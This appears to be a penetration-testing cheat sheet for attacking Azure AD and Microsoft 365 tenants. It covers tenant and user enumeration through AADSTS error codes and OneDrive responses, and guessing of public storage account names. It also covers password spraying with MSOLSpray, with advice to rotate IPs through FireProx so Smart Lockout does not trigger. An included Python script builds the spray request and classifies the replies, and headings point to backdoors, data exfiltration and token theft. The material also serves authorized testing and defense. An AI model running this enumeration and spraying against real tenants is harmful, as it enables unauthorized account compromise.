Pentest - Azure AD
Basic Recon
Detect M365 usage: https://login.microsoftonline.com/getuserrealm.srf?login=test@acmecorp.com&xml=1 (NameSpaceType of Managed or Federated means the domain belongs to a tenant; Unknown means it does not; federated domains also return the federation AuthURL)
Tenant ID: https://login.microsoftonline.com/<target domain>/v2.0/.well-known/openid-configuration (the tenant GUID is embedded in the token_endpoint and issuer URLs of the returned JSON)
User enumeration: POST a password grant to https://login.microsoftonline.com/common/oauth2/token and read the AADSTS code in error_description: AADSTS50034 = user does not exist; AADSTS50126 = user exists, wrong password; AADSTS50053 = locked out (Smart Lockout); AADSTS50057 = disabled; AADSTS50076/50079 = valid credentials, MFA required; AADSTS53003 = valid credentials, blocked by Conditional Access
Detect invalid users while password spraying with: MSOLSpray
Enumerate users via OneDrive: onedrive_user_enum (requests personal OneDrive URLs on <tenant>-my.sharepoint.com unauthenticated; a 403 means the user exists, a 404 means it does not, and nothing is logged against the account)
Data in public Azure blobs (account names are 3-24 lowercase letters and digits, so they can be guessed with a wordlist):
- storage-acct-name.blob.core.windows.net
- storage-acct-name.file.core.windows.net
- storage-acct-name.table.core.windows.net
- storage-acct-name.queue.core.windows.net
- list a container anonymously: https://storage-acct-name.blob.core.windows.net/<container>?restype=container&comp=list (only works when the container's public access level allows listing)
cloud_enum (Chris Moberly / initstring) - brute-forces storage account and container names across Azure, AWS and GCP
Azure Smart Lockout - protection from password spraying; locks the account for the attacking IP after repeated failures (AADSTS50053), so spray slowly and rotate source IPs
Bypass IP-based lockout with FireProx + MSOLSpray - FireProx fronts each request with an AWS API Gateway endpoint so every request arrives from a different IP
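The recon checks above (realm detection, tenant ID lookup, AADSTS-based user enumeration and storage endpoint guessing) as one runnable Python script. This is an added example, not code from the page or from any of the tools it names; the response bodies are constructed samples that mirror the shape of the real endpoints, and the tenant GUID and account names in them are placeholders. The Azure AD PowerShell client ID is the public one MSOLSpray uses; the error-code table covers the codes a sprayer most often sees.

```python
"""Azure AD / M365 recon helpers (added example; runs offline on constructed samples)."""
import json
import re
import xml.etree.ElementTree as ET

LOGIN = "https://login.microsoftonline.com"
# Well-known public client ID of the Azure AD PowerShell module (what MSOLSpray uses).
AZURE_AD_PS_CLIENT_ID = "1b730954-1685-4b74-9bfd-dac224a7b894"

# AADSTS codes returned by /common/oauth2/token and what each one tells the attacker.
AADSTS = {
    "50034": "user does not exist",
    "50126": "user exists, invalid password",
    "50053": "user exists, locked out (Smart Lockout) - stop spraying from this IP",
    "50055": "user exists, password expired",
    "50056": "user exists, no password in this tenant (federated or passwordless)",
    "50057": "user exists, account disabled",
    "50076": "valid credentials, MFA required",
    "50079": "valid credentials, MFA enrollment required",
    "53003": "valid credentials, blocked by Conditional Access",
    "50128": "domain is not verified in any tenant",
    "50059": "domain is not verified in any tenant",
}
GUID_RE = re.compile(r"[0-9a-f]{8}-(?:[0-9a-f]{4}-){3}[0-9a-f]{12}", re.I)
STORAGE_NAME_RE = re.compile(r"^[a-z0-9]{3,24}$")


def user_realm_url(email):
    return f"{LOGIN}/getuserrealm.srf?login={email}&xml=1"


def openid_config_url(domain):
    return f"{LOGIN}/{domain}/v2.0/.well-known/openid-configuration"


def parse_user_realm(xml_text):
    """Pull the fields that matter out of a getuserrealm.srf XML response."""
    root = ET.fromstring(xml_text)
    fields = ("NameSpaceType", "DomainName", "FederationBrandName", "AuthURL")
    return {f: (root.findtext(f) or "") for f in fields}


def tenant_id_from_openid(json_text):
    """The tenant GUID is the path segment of token_endpoint in the OpenID metadata."""
    cfg = json.loads(json_text)
    m = GUID_RE.search(cfg.get("token_endpoint", ""))
    return m.group(0) if m else None


def password_grant_body(username, password, client_id=AZURE_AD_PS_CLIENT_ID):
    """Form fields for the ROPC request to /common/oauth2/token used for enumeration/spraying."""
    return {"grant_type": "password", "username": username, "password": password,
            "client_id": client_id, "resource": "https://graph.windows.net", "scope": "openid"}


def classify_token_error(body_text):
    """Map a token-endpoint response body to what it reveals about the account."""
    try:
        body = json.loads(body_text)
    except ValueError:
        return "unparseable response"
    if "access_token" in body:
        return "valid credentials, token issued"
    m = re.search(r"AADSTS(\d+)", body.get("error_description", ""))
    if not m:
        return "unknown error"
    return AADSTS.get(m.group(1), f"unmapped AADSTS{m.group(1)}")


def storage_endpoints(account):
    """The four service hostnames for a storage account; rejects names Azure would never allow."""
    if not STORAGE_NAME_RE.match(account):
        raise ValueError("storage account names are 3-24 lowercase letters and digits")
    return {svc: f"https://{account}.{svc}.core.windows.net" for svc in ("blob", "file", "table", "queue")}


def container_list_url(account, container):
    """Anonymous container listing URL; succeeds only if public access allows listing."""
    return f"{storage_endpoints(account)['blob']}/{container}?restype=container&comp=list"


# Constructed samples shaped like the real responses (placeholder tenant GUID and domain).
SAMPLE_REALM_XML = ('<RealmInfo Success="true"><State>3</State><UserState>2</UserState>'
                    '<Login>test@acmecorp.com</Login><NameSpaceType>Managed</NameSpaceType>'
                    '<DomainName>acmecorp.com</DomainName><FederationBrandName>Acme Corp</FederationBrandName>'
                    '<CloudInstanceName>microsoftonline.com</CloudInstanceName></RealmInfo>')
SAMPLE_OPENID_JSON = json.dumps({
    "token_endpoint": f"{LOGIN}/11111111-2222-3333-4444-555555555555/oauth2/v2.0/token",
    "issuer": f"{LOGIN}/11111111-2222-3333-4444-555555555555/v2.0"})
SAMPLE_TOKEN_ERRORS = {
    "nobody": json.dumps({"error": "invalid_grant", "error_description":
                          "AADSTS50034: The user account does not exist in the acmecorp.com directory."}),
    "alice": json.dumps({"error": "invalid_grant", "error_description":
                         "AADSTS50126: Error validating credentials due to invalid username or password."}),
    "bob": json.dumps({"error": "interaction_required", "error_description":
                       "AADSTS50076: Due to a configuration change made by your administrator, you must use MFA."}),
}

if __name__ == "__main__":
    print(user_realm_url("test@acmecorp.com"), parse_user_realm(SAMPLE_REALM_XML))
    print(openid_config_url("acmecorp.com"), tenant_id_from_openid(SAMPLE_OPENID_JSON))
    for user, body in SAMPLE_TOKEN_ERRORS.items():
        print(user, "->", classify_token_error(body))
    print(container_list_url("acmecorpdata", "backups"))
```

Feed the parsers the bodies you actually receive (urllib or requests on the URLs the builders return); `password_grant_body` is the payload to POST, and `classify_token_error` turns each reply into the existence/lockout/MFA signal MSOLSpray reports per user.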
User Account Enumeration
Password Spray Attacks with PowerShell
Conditional Access as Code
Breach Response
PIM (Privileged Identity Management) Roles - PowerShell
CAP (Conditional Access Policy) - require a privileged access workstation for Global Admins
Tenant Enum with B2B guest accounts
Mapping Tenant
Attacking Conditional Access Policies (CAP)
365 Data Exfil
Incident Response
Protect Identities
Risky User Report
Create Backdoor in AAD
AADInternals PowerShell module:
Tokens
Token Theft - Red Team (TrustedSec)
Token Tactics: github (rvrsh3ll/TokenTactics)